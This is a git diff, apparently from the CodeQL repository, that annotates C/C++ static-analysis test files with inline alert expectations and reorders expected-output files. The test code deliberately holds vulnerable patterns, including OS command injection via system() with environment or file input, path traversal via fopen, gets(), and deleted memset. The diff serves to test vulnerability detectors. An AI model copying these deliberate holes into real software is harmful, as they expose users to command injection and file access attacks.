not_declared_defined_with(4LL, 0, 2.5e9f); // BAD // $ Alert[cpp/mistyped-function-arguments] declared_with_pointers(pv, ca); // GOOD - declared_with_pointers(3.5e15, 0); // BAD + declared_with_pointers(3.5e15, 0); // BAD // $ Alert[cpp/mistyped-function-arguments] declared_with_array("Hello"); // GOOD - declared_with_array(&x); // BAD + declared_with_array(&x); // BAD // $ Alert[cpp/mistyped-function-arguments] - defined_with_float(2.f); // BAD - defined_with_float(2.0); // BAD + defined_with_float(2.f); // BAD // $ Alert[cpp/mistyped-function-arguments] + defined_with_float(2.0); // BAD // $ Alert[cpp/mistyped-function-arguments] - defined_with_double(2.f); // BAD (GOOD for everything except for cpp/implicit-function-declaration) - defined_with_double('c'); // BAD + defined_with_double(2.f); // BAD (GOOD for everything except for cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] + defined_with_double('c'); // BAD // $ Alert[cpp/mistyped-function-arguments] - defined_with_long_long('c'); // BAD - defined_with_long_long(3); // BAD + defined_with_long_long('c'); // BAD // $ Alert[cpp/mistyped-function-arguments] + defined_with_long_long(3); // BAD // $ Alert[cpp/mistyped-function-arguments] - defined_with_double(2LL); // BAD - defined_with_long_long(3.5e15); // BAD + defined_with_double(2LL); // BAD // $ Alert[cpp/mistyped-function-arguments] + defined_with_long_long(3.5e15); // BAD // $ Alert[cpp/mistyped-function-arguments] k_and_r_func(2.5, &s); // GOOD int (*parameterName)[2]; - defined_with_ptr_ptr(parameterName); // // BAD (GOOD for everything except for cpp/implicit-function-declaration) + defined_with_ptr_ptr(parameterName); // // BAD (GOOD for everything except for cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] defined_with_ptr_ptr(argv); // GOOD - defined_with_ptr_arr(parameterName); // // BAD (GOOD for everything except for cpp/implicit-function-declaration) + defined_with_ptr_arr(parameterName); // // BAD (GOOD for everything except for cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] defined_with_ptr_arr(argv); // GOOD declared_and_defined_empty(); // GOOD - declared_and_defined_empty(1); // BAD + declared_and_defined_empty(1); // BAD // $ Alert[cpp/futile-params] } void not_yet_declared1(); @@ -85,7 +85,7 @@ void not_declared_defined_with(int x, int y, int z) { int dereference(); int caller(void) { - return dereference(); // BAD + return dereference(); // BAD // $ Alert[cpp/too-few-arguments] } int dereference(int *x) { return *x; } @@ -130,8 +130,8 @@ extern int extern_definition(double, double*); void test_implicit_function_declaration(int x, double d) { int y; - implicit_declaration(1, 2); // BAD - implicit_declaration_k_and_r(1, 2); // BAD + implicit_declaration(1, 2); // BAD // $ Alert[cpp/implicit-function-declaration] + implicit_declaration_k_and_r(1, 2); // BAD // $ Alert[cpp/implicit-function-declaration] implicit_declaration(1, 2); // GOOD (no longer an implicit declaration) diff --git a/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/UseInOwnInitializer.qlref b/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/UseInOwnInitializer.qlref index 8242a3a6403b..f4ba94dd082f 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/UseInOwnInitializer.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/UseInOwnInitializer.qlref @@ -1 +1,2 @@ -Likely Bugs/UseInOwnInitializer.ql +query: Likely Bugs/UseInOwnInitializer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/test.cpp index 41dde27c5a09..dc5cbb9c49a4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/UseInOwnInitializer/test.cpp @@ -1,11 +1,11 @@ typedef long size_t; void test1() { - int x = x; // BAD + int x = x; // BAD // $ Alert } void test2() { - int x = x = 2; // BAD + int x = x = 2; // BAD // $ Alert } void test3() { @@ -54,11 +54,11 @@ void test9() { } void test10() { - int x = x + 1; // BAD: x is evaluated on the right hand side + int x = x + 1; // BAD: x is evaluated on the right hand side // $ Alert } void test11() { - int x = uninitialized(x) + 1; // BAD: x is evaluated on the right hand side + int x = uninitialized(x) + 1; // BAD: x is evaluated on the right hand side // $ Alert } #define self_initialize(t, x) t x = x diff --git a/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfCode.qlref b/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfCode.qlref index 2297839a1bf3..ffc998288f1f 100644 --- a/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfCode.qlref +++ b/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfCode.qlref @@ -1 +1 @@ -Metrics/Functions/FunLinesOfCode.ql +query: Metrics/Functions/FunLinesOfCode.ql diff --git a/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfComments.qlref b/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfComments.qlref index 22982899aad4..0a15219eae1e 100644 --- a/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfComments.qlref +++ b/cpp/ql/test/query-tests/Metrics/Functions/FunLinesOfComments.qlref @@ -1 +1 @@ -Metrics/Functions/FunLinesOfComments.ql +query: Metrics/Functions/FunLinesOfComments.ql diff --git a/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfCalls.qlref b/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfCalls.qlref index d3d6f76ce70f..32203bddc4de 100644 --- a/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfCalls.qlref +++ b/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfCalls.qlref @@ -1 +1 @@ -Metrics/Functions/FunNumberOfCalls.ql +query: Metrics/Functions/FunNumberOfCalls.ql diff --git a/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfParameters.qlref b/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfParameters.qlref index 26fc860b76da..3601ca985073 100644 --- a/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfParameters.qlref +++ b/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfParameters.qlref @@ -1 +1 @@ -Metrics/Functions/FunNumberOfParameters.ql +query: Metrics/Functions/FunNumberOfParameters.ql diff --git a/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfStatements.qlref b/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfStatements.qlref index 78f61924a025..ad24a29dddf1 100644 --- a/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfStatements.qlref +++ b/cpp/ql/test/query-tests/Metrics/Functions/FunNumberOfStatements.qlref @@ -1 +1 @@ -Metrics/Functions/FunNumberOfStatements.ql +query: Metrics/Functions/FunNumberOfStatements.ql diff --git a/cpp/ql/test/query-tests/Power of 10/Rule 2/BoundedLoopIterations.qlref b/cpp/ql/test/query-tests/Power of 10/Rule 2/BoundedLoopIterations.qlref index bd3a3b016916..28e3197a8f70 100644 --- a/cpp/ql/test/query-tests/Power of 10/Rule 2/BoundedLoopIterations.qlref +++ b/cpp/ql/test/query-tests/Power of 10/Rule 2/BoundedLoopIterations.qlref @@ -1 +1,2 @@ -Power of 10/Rule 2/BoundedLoopIterations.ql +query: Power of 10/Rule 2/BoundedLoopIterations.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Power of 10/Rule 2/loops.cpp b/cpp/ql/test/query-tests/Power of 10/Rule 2/loops.cpp index 29ca9fa1ccda..7d2564f955e4 100644 --- a/cpp/ql/test/query-tests/Power of 10/Rule 2/loops.cpp +++ b/cpp/ql/test/query-tests/Power of 10/Rule 2/loops.cpp @@ -21,20 +21,20 @@ void f() { while (i < bound) { i++; } // Good: Bound not modified in loop. do { i++; } while (i < bound); // Good: Bound not modified in loop. - for (i = 0; i < 10; i--); // Bad: No increment. - while (i < 10) { } // Bad: No increment. - do { i += 2; } while (i > 10); // Bad: No decrement. - while (i > 10) { if (i < 5) i--; } // Bad: Conditional decrement. - while (i < bound) { i++; bound++; } // Bad: Bound modified in loop. - while (i < bound) { i++; bound >>= 1; } // Bad: Bound modified in loop. - while (i > bound) { i--; bound += 1; } // Bad: Bound modified in loop. - while (i > bound) { i--; bound = bound; } // Bad: Bound modified in loop. - for (; xs->next; xs = xs->next); // Bad: No bound. - while (i <= -i) {} // Bad: Hidden infinite loop. + for (i = 0; i < 10; i--); // Bad: No increment. // $ Alert + while (i < 10) { } // Bad: No increment. // $ Alert + do { i += 2; } while (i > 10); // Bad: No decrement. // $ Alert + while (i > 10) { if (i < 5) i--; } // Bad: Conditional decrement. // $ Alert + while (i < bound) { i++; bound++; } // Bad: Bound modified in loop. // $ Alert + while (i < bound) { i++; bound >>= 1; } // Bad: Bound modified in loop. // $ Alert + while (i > bound) { i--; bound += 1; } // Bad: Bound modified in loop. // $ Alert + while (i > bound) { i--; bound = bound; } // Bad: Bound modified in loop. // $ Alert + for (; xs->next; xs = xs->next); // Bad: No bound. // $ Alert + while (i <= -i) {} // Bad: Hidden infinite loop. // $ Alert while (i < 10) { i = i + 1; } // Good: Fixed bound. while (i > 10) { i = i - 1; } // Good: Fixed bound. - while (i < 10) { i = 0; } // Bad: increment outside loop - while (i > 10) { i = 0; } // Bad: decrement outside loop - while (i > 10) { i = 1 - i; } // Bad: Swapped operands to `-` + while (i < 10) { i = 0; } // Bad: increment outside loop // $ Alert + while (i > 10) { i = 0; } // Bad: decrement outside loop // $ Alert + while (i > 10) { i = 1 - i; } // Bad: Swapped operands to `-` // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-014/MemsetMayBeDeleted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-014/MemsetMayBeDeleted.qlref index e81526fe6d9d..bc89bc58f77a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-014/MemsetMayBeDeleted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-014/MemsetMayBeDeleted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-014/MemsetMayBeDeleted.ql +query: Security/CWE/CWE-014/MemsetMayBeDeleted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-014/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-014/test.cpp index 1e0ed7d70f00..d859a263780d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-014/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-014/test.cpp @@ -45,7 +45,7 @@ char *func2(char buff[128], unsigned long long sz) { void func3(unsigned long long sz) { char buff[128]; gets(buff); - memset(buff, 0, PW_SIZE); // BAD + memset(buff, 0, PW_SIZE); // BAD // $ Alert } // x86-64 gcc 9.2: deleted @@ -76,7 +76,7 @@ void func5(unsigned long long sz) { void func6(unsigned long long sz) { struct mem m; gets(m.b); - memset(&m, 0, PW_SIZE); // BAD + memset(&m, 0, PW_SIZE); // BAD // $ Alert } // x86-64 gcc 9.2: deleted @@ -205,7 +205,7 @@ void badFunc0_0(){ for(int i = 0; i < PW_SIZE; i++) { buff1[i] = 13; } - memset(buff1, 0, PW_SIZE); // BAD + memset(buff1, 0, PW_SIZE); // BAD // $ Alert } void nobadFunc1_0() { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp index 876584c51174..e0ad12c94688 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp @@ -52,7 +52,7 @@ void bad() if (FILENAME_MAX-dataLen > 1) { /* POTENTIAL FLAW: Read data from the console */ - if (fgets(data+dataLen, (int)(FILENAME_MAX-dataLen), stdin) != NULL) + if (fgets(data+dataLen, (int)(FILENAME_MAX-dataLen), stdin) != NULL) // $ Source { /* The next few lines remove the carriage return from the string that is * inserted by fgets() */ @@ -74,7 +74,7 @@ void bad() { FILE *pFile = NULL; /* POTENTIAL FLAW: Possibly opening a file without validating the file name or path */ - pFile = FOPEN(data, "wb+"); + pFile = FOPEN(data, "wb+"); // $ Alert if (pFile != NULL) { fclose(pFile); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected index 031804b92251..8ebb959ae4b5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected @@ -1,3 +1,5 @@ +#select +| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | data | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | This argument to a file access function is derived from $@ and then passed to fopen(filename). | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | user input (string read by fgets) | edges | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:62:25:62:46 | ... = ... | provenance | | | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:69:21:69:40 | ... = ... | provenance | | @@ -10,5 +12,3 @@ nodes | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:69:21:69:40 | ... = ... | semmle.label | ... = ... | | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | semmle.label | *data | subpaths -#select -| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | data | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | This argument to a file access function is derived from $@ and then passed to fopen(filename). | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | user input (string read by fgets) | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.qlref index 1677939387da..399ff4f1909f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-022/TaintedPath.ql \ No newline at end of file +query: Security/CWE/CWE-022/TaintedPath.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected index bb1caa71e120..784928db0533 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected @@ -1,3 +1,5 @@ +#select +| tests.cpp:53:16:53:19 | data | tests.cpp:33:34:33:39 | *call to getenv | tests.cpp:53:16:53:19 | *data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | tests.cpp:33:34:33:39 | *call to getenv | user input (an environment variable) | tests.cpp:38:25:38:36 | strncat output argument | strncat output argument | edges | tests.cpp:26:15:26:23 | **badSource | tests.cpp:51:12:51:20 | *call to badSource | provenance | | | tests.cpp:33:34:33:39 | *call to getenv | tests.cpp:33:34:33:39 | *call to getenv | provenance | | @@ -18,5 +20,3 @@ nodes | tests.cpp:51:12:51:20 | *call to badSource | semmle.label | *call to badSource | | tests.cpp:53:16:53:19 | *data | semmle.label | *data | subpaths -#select -| tests.cpp:53:16:53:19 | data | tests.cpp:33:34:33:39 | *call to getenv | tests.cpp:53:16:53:19 | *data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | tests.cpp:33:34:33:39 | *call to getenv | user input (an environment variable) | tests.cpp:38:25:38:36 | strncat output argument | strncat output argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.qlref index 9fe2347270f2..4e996a47ad54 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-078/ExecTainted.ql \ No newline at end of file +query: Security/CWE/CWE-078/ExecTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/tests.cpp index 80f8221d9033..c8918ffc45e2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/tests.cpp @@ -30,7 +30,7 @@ static char * badSource(char * data) { /* Append input from an environment variable to data */ size_t dataLen = strlen(data); - char * environment = GETENV(ENV_VARIABLE); + char * environment = GETENV(ENV_VARIABLE); // $ Source /* If there is data in the environment variable */ if (environment != NULL) { @@ -50,7 +50,7 @@ void CWE78_OS_Command_Injection__char_environment_system_21_bad() badStatic = 1; /* true */ data = badSource(data); /* POTENTIAL FLAW: Execute command in data possibly leading to command injection [NOT DETECTED] */ - if (SYSTEM(data) != 0) + if (SYSTEM(data) != 0) // $ Alert { printLine("command execution failed!"); exit(1); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected index 18dd45752ccb..24f63e6cfaa5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected @@ -1,3 +1,28 @@ +#select +| test.cpp:23:12:23:19 | command1 | test.cpp:15:27:15:30 | **argv | test.cpp:23:12:23:19 | *command1 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:15:27:15:30 | **argv | user input (a command-line argument) | test.cpp:22:13:22:20 | sprintf output argument | sprintf output argument | +| test.cpp:51:10:51:16 | command | test.cpp:47:21:47:26 | *call to getenv | test.cpp:51:10:51:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:47:21:47:26 | *call to getenv | user input (an environment variable) | test.cpp:50:11:50:17 | sprintf output argument | sprintf output argument | +| test.cpp:66:10:66:16 | command | test.cpp:63:9:63:16 | fread output argument | test.cpp:66:10:66:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:63:9:63:16 | fread output argument | user input (string read by fread) | test.cpp:65:11:65:17 | strncat output argument | strncat output argument | +| test.cpp:86:32:86:38 | command | test.cpp:83:9:83:16 | fread output argument | test.cpp:86:32:86:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:83:9:83:16 | fread output argument | user input (string read by fread) | test.cpp:85:11:85:17 | strncat output argument | strncat output argument | +| test.cpp:95:45:95:48 | path | test.cpp:92:9:92:16 | fread output argument | test.cpp:95:45:95:48 | *path | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:92:9:92:16 | fread output argument | user input (string read by fread) | test.cpp:94:11:94:14 | strncat output argument | strncat output argument | +| test.cpp:109:18:109:22 | call to c_str | test.cpp:107:20:107:38 | *call to getenv | test.cpp:109:18:109:22 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:107:20:107:38 | *call to getenv | user input (an environment variable) | test.cpp:108:31:108:31 | call to operator+ | call to operator+ | +| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:10:115:23 | call to operator+ | call to operator+ | +| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:17:115:17 | call to operator+ | call to operator+ | +| test.cpp:121:25:121:28 | call to data | test.cpp:120:20:120:38 | *call to getenv | test.cpp:121:10:121:30 | *call to data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:120:20:120:38 | *call to getenv | user input (an environment variable) | test.cpp:121:17:121:17 | call to operator+ | call to operator+ | +| test.cpp:144:10:144:16 | command | test.cpp:141:9:141:11 | fread output argument | test.cpp:144:10:144:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:141:9:141:11 | fread output argument | user input (string read by fread) | test.cpp:143:11:143:17 | sprintf output argument | sprintf output argument | +| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:178:13:178:17 | strncat output argument | strncat output argument | +| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:179:13:179:19 | strncat output argument | strncat output argument | +| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:181:13:181:19 | strncat output argument | strncat output argument | +| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:188:11:188:15 | strncat output argument | strncat output argument | +| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:189:11:189:17 | strncat output argument | strncat output argument | +| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | +| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | +| test.cpp:234:10:234:15 | buffer | test.cpp:231:19:231:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:231:19:231:33 | *call to getenv | user input (an environment variable) | test.cpp:231:11:231:16 | strncat output argument | strncat output argument | +| test.cpp:234:10:234:15 | buffer | test.cpp:232:19:232:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:232:19:232:33 | *call to getenv | user input (an environment variable) | test.cpp:232:11:232:16 | strncat output argument | strncat output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:243:5:243:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:243:5:243:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:242:11:242:17 | sprintf output argument | sprintf output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:248:5:248:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:248:5:248:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | +| test.cpp:261:10:261:15 | buffer | test.cpp:259:21:259:35 | *call to getenv | test.cpp:261:10:261:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:259:21:259:35 | *call to getenv | user input (an environment variable) | test.cpp:259:13:259:18 | strncat output argument | strncat output argument | edges | test.cpp:15:27:15:30 | **argv | test.cpp:16:20:16:26 | *access to array | provenance | | | test.cpp:16:20:16:26 | *access to array | test.cpp:22:45:22:52 | *userName | provenance | | @@ -202,28 +227,3 @@ subpaths | test.cpp:197:26:197:33 | *filename | test.cpp:187:47:187:54 | *filename | test.cpp:187:19:187:25 | *command | test.cpp:197:10:197:16 | concat output argument | | test.cpp:197:26:197:33 | *filename | test.cpp:187:47:187:54 | *filename | test.cpp:187:19:187:25 | *command [Return] | test.cpp:197:10:197:16 | concat output argument | | test.cpp:197:26:197:33 | *filename | test.cpp:187:47:187:54 | *filename | test.cpp:187:19:187:25 | *command [Return] | test.cpp:197:10:197:16 | concat output argument | -#select -| test.cpp:23:12:23:19 | command1 | test.cpp:15:27:15:30 | **argv | test.cpp:23:12:23:19 | *command1 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:15:27:15:30 | **argv | user input (a command-line argument) | test.cpp:22:13:22:20 | sprintf output argument | sprintf output argument | -| test.cpp:51:10:51:16 | command | test.cpp:47:21:47:26 | *call to getenv | test.cpp:51:10:51:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:47:21:47:26 | *call to getenv | user input (an environment variable) | test.cpp:50:11:50:17 | sprintf output argument | sprintf output argument | -| test.cpp:66:10:66:16 | command | test.cpp:63:9:63:16 | fread output argument | test.cpp:66:10:66:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:63:9:63:16 | fread output argument | user input (string read by fread) | test.cpp:65:11:65:17 | strncat output argument | strncat output argument | -| test.cpp:86:32:86:38 | command | test.cpp:83:9:83:16 | fread output argument | test.cpp:86:32:86:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:83:9:83:16 | fread output argument | user input (string read by fread) | test.cpp:85:11:85:17 | strncat output argument | strncat output argument | -| test.cpp:95:45:95:48 | path | test.cpp:92:9:92:16 | fread output argument | test.cpp:95:45:95:48 | *path | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:92:9:92:16 | fread output argument | user input (string read by fread) | test.cpp:94:11:94:14 | strncat output argument | strncat output argument | -| test.cpp:109:18:109:22 | call to c_str | test.cpp:107:20:107:38 | *call to getenv | test.cpp:109:18:109:22 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:107:20:107:38 | *call to getenv | user input (an environment variable) | test.cpp:108:31:108:31 | call to operator+ | call to operator+ | -| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:10:115:23 | call to operator+ | call to operator+ | -| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:17:115:17 | 